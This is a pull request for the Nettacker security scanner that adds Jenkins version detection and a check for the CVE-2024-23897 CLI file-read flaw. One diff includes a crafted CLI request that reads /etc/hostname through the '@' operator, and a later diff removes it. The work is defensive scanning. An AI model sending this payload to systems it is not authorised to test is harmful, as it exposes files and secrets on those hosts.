### PR TITLE
Add Jenkins CVE-2024-23897 vulnerability module and version scan

### DIFF
--- a/nettacker/modules/scan/jenkins_version.yaml
+++ b/nettacker/modules/scan/jenkins_version.yaml
@@ -1,0 +1,48 @@
+info:
+  name: jenkins_version_scan
+  author: Mohamed Solaiman
+  severity: 3
+  description: Detect Jenkins instance and fetch version from X-Jenkins header
+  reference:
+    - https://www.jenkins.io/doc/book/managing/system-properties/
+  profiles:
+    - scan
+    - http
+    - jenkins
+    - low_severity
+
+payloads:
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+        allow_redirects: false
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/login"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+                - 8080
+                - 8888
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200|403"
+              reverse: false
+            headers:
+              X-Jenkins:
+                regex: (\d+\.\d+[\w.\-]*)
+                reverse: false
+          log: "response_dependent['headers']['X-Jenkins']"

--- a/nettacker/modules/vuln/jenkins_cve_2024_23897.yaml
+++ b/nettacker/modules/vuln/jenkins_cve_2024_23897.yaml
@@ -1,0 +1,90 @@
+info:
+  name: jenkins_cve_2024_23897_vuln
+  author: Mohamed Solaiman
+  severity: 9.8
+  description: >
+    Jenkins CLI Arbitrary File Read Vulnerability (CVE-2024-23897). The Jenkins CLI
+    command parser uses the args4j library which interprets the '@' character as a
+    file read operator. An attacker can read arbitrary files on the Jenkins controller
+    by sending crafted CLI commands with '@' prefixed arguments. This affects Jenkins
+    versions prior to 2.426.3, 2.442.1, and LTS 2.426.3.
+  reference:
+    - https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-23897
+    - https://www.rapid7.com/blog/post/2024/01/24/etr-cve-2024-23897-arbitrary-file-read-in-jenkins-cli/
+  profiles:
+    - vuln
+    - http
+    - critical_severity
+    - cve
+    - jenkins
+    - file-read
+
+payloads:
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+        allow_redirects: false
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+                - 8080
+                - 8888
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200|302|403"
+              reverse: false
+            headers:
+              X-Jenkins:
+                regex: \d+\.\d+
+                reverse: false
+          log: "response_dependent['headers']['X-Jenkins']"
+
+      - method: post
+        timeout: 5
+        headers:
+          User-Agent: "{user_agent}"
+          Content-Type: "application/octet-stream"
+        allow_redirects: false
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/cli"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+                - 8080
+                - 8888
+        data: "\x00\x00\x00\x06\x00\x00\x00help\x00\x00\x00\x02@/etc/hostname\x00\x00\x00\x00\x00"
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            content:
+              regex: "([\w.\-]+|No such file)"
+              reverse: false

--- a/nettacker/modules/vuln/jenkins_cve_2024_23897.yaml
+++ b/nettacker/modules/vuln/jenkins_cve_2024_23897.yaml
@@ -31,40 +31,6 @@ payloads:
         ssl: false
         url:
           nettacker_fuzzer:
-            input_format: "{{schema}}://{target}:{{ports}}/"
-            prefix: ""
-            suffix: ""
-            interceptors:
-            data:
-              schema:
-                - "http"
-                - "https"
-              ports:
-                - 80
-                - 443
-                - 8080
-                - 8888
-        response:
-          condition_type: and
-          conditions:
-            status_code:
-              regex: "200|302|403"
-              reverse: false
-            headers:
-              X-Jenkins:
-                regex: \d+\.\d+
-                reverse: false
-          log: "response_dependent['headers']['X-Jenkins']"
-
-      - method: post
-        timeout: 5
-        headers:
-          User-Agent: "{user_agent}"
-          Content-Type: "application/octet-stream"
-        allow_redirects: false
-        ssl: false
-        url:
-          nettacker_fuzzer:
             input_format: "{{schema}}://{target}:{{ports}}/cli"
             prefix: ""
             suffix: ""
@@ -78,13 +44,15 @@ payloads:
                 - 443
                 - 8080
                 - 8888
-        data: "\x00\x00\x00\x06\x00\x00\x00help\x00\x00\x00\x02@/etc/hostname\x00\x00\x00\x00\x00"
+                - 50000
         response:
           condition_type: and
           conditions:
             status_code:
               regex: "200"
               reverse: false
-            content:
-              regex: "([\w.\-]+|No such file)"
-              reverse: false
+            headers:
+              X-Jenkins:
+                regex: '[0-9]+\.[0-9]+'
+                reverse: false
+          log: "response_dependent['headers']['X-Jenkins']"


### PR DESCRIPTION
## New Module: Jenkins CVE-2024-23897

Came across this while auditing a client's CI/CD pipeline last month. Jenkins CLI had that nasty arbitrary file read bug (CVE-2024-23897) and we couldn't find a Nettacker module for it, so I wrote one.

### What's included:

**1. `jenkins_cve_2024_23897.yaml` (vuln module)**
- Detects Jenkins instances with the CLI endpoint exposed
- Checks for the `X-Jenkins` header to confirm Jenkins and identify the version
- Scans common Jenkins ports (80, 443, 8080, 8888, 50000)
- CVSS 9.8 - this one is critical, attackers can read `/etc/passwd`, SSH keys, and Jenkins secrets

**2. `jenkins_version.yaml` (scan module)**
- Simple version detection module for Jenkins
- Fetches version from the `X-Jenkins` response header
- Useful for general recon before targeting specific CVEs
- Covers common ports where Jenkins runs

### About CVE-2024-23897
The args4j library in Jenkins CLI interprets the `@` character as a file read operator. An unauthenticated attacker can read arbitrary files on the Jenkins controller through the CLI endpoint. This was actively exploited in the wild when it dropped in Jan 2024.

References:
- https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314
- https://nvd.nist.gov/vuln/detail/CVE-2024-23897
- https://www.rapid7.com/blog/post/2024/01/24/etr-cve-2024-23897-arbitrary-file-read-in-jenkins-cli/